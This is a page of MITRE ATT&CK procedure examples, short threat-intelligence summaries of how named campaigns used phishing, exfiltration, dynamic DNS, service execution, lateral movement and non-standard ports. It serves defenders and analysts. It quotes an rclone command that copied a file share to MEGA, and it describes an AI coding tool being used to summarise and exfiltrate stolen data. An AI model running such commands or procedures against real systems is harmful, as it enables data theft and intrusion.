ATT&CKProcedure examples

Procedure examples

Real-world descriptions of how a group, tool or campaign used a technique.

1146 examples

TechniqueUsed byProcedure example
T1566.001
Spearphishing Attachment
CampaignOperation Spalax

During Operation Spalax, the threat actors sent phishing emails that included a PDF document that in some cases led to the download and execution of malware.

T1566.001
Spearphishing Attachment
CampaignWater Curupira Pikabot Distribution

Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers.

T1566.001
Spearphishing Attachment
CampaignC0015

For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.

T1566.001
Spearphishing Attachment
CampaignOperation AkaiRyū

During Operation AkaiRyū, MirrorFace distributed crafted spearphishing emails containing malicious attachments.

T1566.001
Spearphishing Attachment
CampaignC0011

During C0011, Transparent Tribe sent malicious attachments via email to student targets in India.

T1566.002
Spearphishing Link
CampaignOperation Dream Job

During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email.

T1566.002
Spearphishing Link
CampaignRedDelta Modified PlugX Infection Chain Operations

Mustang Panda distributed malicious links in phishing emails leading to HTML files that would direct the victim to malicious MSC files if running Windows based on User Agent fingerprinting during RedDelta Modified PlugX Infection Chain Operations.

T1566.002
Spearphishing Link
CampaignOperation Dust Storm

During Operation Dust Storm, the threat actors sent spearphishing emails containing a malicious link.

T1566.002
Spearphishing Link
CampaignOperation Spalax

During Operation Spalax, the threat actors sent phishing emails to victims that contained a malicious link.

T1566.002
Spearphishing Link
CampaignC0021

During C0021, the threat actors sent phishing emails with unique malicious links, likely for tracking victim clicks.

T1566.002
Spearphishing Link
CampaignPikabot Distribution February 2024

Pikabot Distribution February 2024 utilized emails with hyperlinks leading to malicious ZIP archive files containing scripts to download and install Pikabot.

T1566.002
Spearphishing Link
CampaignOperation AkaiRyū

During Operation AkaiRyū, MirrorFace sent spearphishing emails with malicious OneDrive links.

T1566.002
Spearphishing Link
CampaignNight Dragon

During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.

T1566.002
Spearphishing Link
CampaignC0011

During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India.

T1566.003
Spearphishing via Service
CampaignOperation Dream Job

During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs.

T1566.004
Spearphishing Voice
CampaignC0027

During C0027, Scattered Spider impersonated legitimate IT personnel in phone calls to direct victims to download a remote monitoring and management (RMM) tool that would allow the adversary to remotely control their system.

T1567
Exfiltration Over Web Service
CampaignAnthropic AI-orchestrated Campaign

During the Anthropic AI-orchestrated Campaign, the adversary utilized Claude Code to generate a detailed summary report of collected data, which is then reviewed and approved by the adversary prior to exfiltration of data over Claude.

T1567
Exfiltration Over Web Service
CampaignSalesforce Data Exfiltration

During Salesforce Data Exfiltration, threat actors exfiltrated data via legitimate Salesforce API communication channels including the Salesforce Data Loader application.

T1567
Exfiltration Over Web Service
CampaignAPT28 Nearest Neighbor Campaign

During APT28 Nearest Neighbor Campaign, APT28 exfiltrated data over public-facing webservers – such as Google Drive.

T1567
Exfiltration Over Web Service
CampaignC0017

During C0017, APT41 used Cloudflare services for data exfiltration.

T1567.002
Exfiltration to Cloud Storage
CampaignOperation Dream Job

During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.

T1567.002
Exfiltration to Cloud Storage
CampaignC0015

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.

T1567.002
Exfiltration to Cloud Storage
CampaignAPT41 DUST

APT41 DUST exfiltrated collected information to OneDrive.

T1567.004
Exfiltration Over Webhook
Campaign2025 Poland Wiper Attacks

During the 2025 Poland Wiper Attacks, the adversaries leveraged an attacker-controlled Slack channel to exfiltrate data.

T1568
Dynamic Resolution
CampaignOperation Dust Storm

For Operation Dust Storm, the threat actors used dynamic DNS domains from a variety of free providers, including No-IP, Oray, and 3322.

T1568
Dynamic Resolution
CampaignIndian Critical Infrastructure Intrusions

During Indian Critical Infrastructure Intrusions, RedEcho used dynamic DNS domains associated with malicious infrastructure.

T1568
Dynamic Resolution
CampaignOperation Spalax

For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.

T1568
Dynamic Resolution
CampaignSolarWinds Compromise

During the SolarWinds Compromise, APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.

T1568
Dynamic Resolution
CampaignNight Dragon

During Night Dragon, threat actors used dynamic DNS services for C2.

T1568
Dynamic Resolution
CampaignC0026

During C0026, the threat actors re-registered a ClouDNS dynamic DNS subdomain which was previously used by ANDROMEDA.

T1569.002
Service Execution
CampaignSharePoint ToolShell Exploitation

During SharePoint ToolShell Exploitation, threat actors leveraged PsExec for command execution and used `services.exe` to disable Microsoft Defender via Registry keys.

T1569.002
Service Execution
CampaignOperation Honeybee

During Operation Honeybee, threat actors ran sc start to start the COMSysApp as part of the service hijacking and sc stop to stop and reconfigure the COMSysApp.

T1569.002
Service Execution
CampaignOperation Digital Eye

During Operation Digital Eye, threat actors used the winsw tool to deploy a Visual Studio code executable as a Windows service.

T1569.002
Service Execution
CampaignAPT41 DUST

APT41 DUST used Windows services to execute DUSTPAN.

T1569.002
Service Execution
CampaignOperation Wocao

During Operation Wocao, threat actors created services on remote systems for execution purposes.

T1570
Lateral Tool Transfer
CampaignSharePoint ToolShell Exploitation

During SharePoint ToolShell Exploitation, threat actors used Impacket to remotely stage and execute payloads via WMI.

T1570
Lateral Tool Transfer
Campaign2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, Sandworm Team moved their tools laterally within the corporate network and between the ICS and corporate network.

T1570
Lateral Tool Transfer
CampaignC0018

During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy.

T1570
Lateral Tool Transfer
CampaignC0015

During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.

T1570
Lateral Tool Transfer
CampaignHomeLand Justice

During HomeLand Justice, threat actors initiated a process named Mellona.exe to spread the ROADSWEEP file encryptor and a persistence script to a list of internal machines.

T1570
Lateral Tool Transfer
Campaign2025 Poland Wiper Attacks

During the 2025 Poland Wiper Attacks, the adversaries had placed the malicious payload on an accessible network share to facilitate propagation.

T1570
Lateral Tool Transfer
Campaign2016 Ukraine Electric Power Attack

During the 2016 Ukraine Electric Power Attack, Sandworm Team used `move` to transfer files to a network share.

T1570
Lateral Tool Transfer
CampaignOperation Wocao

During Operation Wocao, threat actors used SMB to copy files to and from target systems.

T1570
Lateral Tool Transfer
Campaign2022 Ukraine Electric Power Attack

During the 2022 Ukraine Electric Power Attack, Sandworm Team used a Group Policy Object (GPO) to copy CaddyWiper's executable `msserver.exe` from a staging server to a local hard drive before deployment.

T1571
Non-Standard Port
CampaignKV Botnet Activity

KV Botnet Activity generates a random port number greater than 30,000 to serve as the listener for subsequent command and control activity.

T1571
Non-Standard Port
CampaignRedPenguin

During RedPenguin, UNC3886 used a backdoor that binds to port 45678 by default.

T1571
Non-Standard Port
CampaignIndian Critical Infrastructure Intrusions

During Indian Critical Infrastructure Intrusions, RedEcho used non-standard ports such as TCP 8080 for HTTP communication.

T1571
Non-Standard Port
CampaignC0018

During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections.

T1571
Non-Standard Port
CampaignC0032

During the C0032 campaign, TEMP.Veles used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2.

T1571
Non-Standard Port
Campaign2025 Poland Wiper Attacks

During the 2025 Poland Wiper Attacks, the adversaries had created a Reverse SOCKS Proxy and communicated over the non-standard port 8008.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.